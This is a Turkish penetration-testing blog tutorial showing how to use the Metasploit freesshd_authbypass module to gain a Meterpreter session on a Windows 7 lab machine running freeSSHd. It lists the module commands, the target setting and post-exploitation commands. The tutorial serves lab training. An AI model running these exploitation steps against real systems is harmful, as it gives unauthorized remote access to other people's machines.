MSF freesshd_authbypass İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
231
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Windows 7 SP1 işletim sisteminde freeSSHd uygulamasına ait zafiyetinin Metasploit Framework ile istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda özel olarak hazırlanmış bir Windows 7 bilgisayar kullanılmıştır. Bunun yerine hazır sanal makineler de kullanılabilir. Örneğin, /dev/random: scream sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/devrandom-scream,47/

freeSSHd uygulaması, güvenilir veri transferi amacıyla kullanılan bir uygulamadır. Bu uygulamadaki anahtar değişimi algoritmasından kaynaklı bellek taşması zafiyeti MSF freesshd_authbypass istismar modülü ile kötüye kullanılarak işletim sistemine Meterpreter bağlantısı elde edilebilir. Eğer kullanıcı adı kolay ve tahmin edilebilir bir şekilde bırakılırsa, parolaya ihtyaç duyulmadan kimlik doğrulaması sağlanır.

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-01

Metasploit üzerinde ilgili modülün seçenekleri aşağıdaki gibidir:

search freesshd
use exploit/windows/ssh/freesshd_authbypass
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-02

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir.

set RHOST 10.3.0.142
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-03

Seçenekler ayarlandıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında uygulamayı çalıştıran kullanıcı haklarıyla Meterpreter bağlantısının elde edildiği görülmektedir.

exploit
getuid
getpid
ps -u Yonetici

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-04

 

Benzer olarak TFTP üzerinden de istismar gerçekleştirilebilirdi.

 

Kaynak:

http://paulsec.github.io/blog/2014/04/16/scream-write-up/
https://www.youtube.com/watch?v=aJktFdwhixY

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.